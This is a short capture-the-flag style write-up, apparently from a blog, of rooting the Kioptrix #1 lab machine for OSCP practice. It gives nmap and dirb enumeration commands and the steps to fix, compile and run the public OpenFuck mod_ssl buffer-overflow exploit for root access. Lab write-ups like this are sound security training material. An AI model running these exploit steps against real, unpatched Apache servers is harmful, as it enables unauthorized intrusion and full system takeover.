Vulnhub link: kioptrix #1
I attempted (and succeeded) to root this box as part of my preparations for the OSCP exam. This was a very easy box to own (it is noted as ‘beginner’ for a reason)
netdiscover to find the target host:
In this case, our target is located at 192.168.174.129. Let’s run a standard nmap scan against it.
nmap -sS -sV -T4 -A -O -v -v -v -v 192.168.174.129
Nothing of interest to be found on the web server that is running on port 80/443. Running dirb against it reveals the directory /manual/ on the server. If we navigate here we can see two manuals for Apache mods. One of these mods is mod_ssl. Navigating to /manual/mod/mod_ssl/ reveals that the version of mod_ssl is 2.8.
Searching exploit-db for Apache 1.3.20, we find a remote buffer overflow vulnerability affecting mod_ssl that allows us to run arbitrary code. Bingo.
Download an exploit of this vulnerability called OpenFuck from GitHub. Depending on whether or not it has been updated from the time of this post, you will have to make one small modification to the source code. In its current state, there is a typo on line 1087 of OpenFuck.c (broken if statement). Change it to so that it matches the following:
if (encrypted_key_length <= 0) {
printf("send client master key: RSA encryption failure\n");
exit(1);
}
You should now be able to successfully compile the exploit using gcc (make sure to link it with the crypto library using the -lcrypto option).
gcc -o OpenFuck OpenFuck.c -lcrypto
Running ./OpenFuck outputs a massive list of OS fingerprints. The two we are interested in are 0x6a and 0x6b for RedHat Linux 7.2 (apache-1.3.20-16)1 and 2. We will pass this parameter to OpenFuck so it knows what memory offset to use.
./OpenFuck 0x6b 192.168.174.129 443 -c 40
After a few seconds, we should have root access to the box.
NeverSecure 
Leave a Reply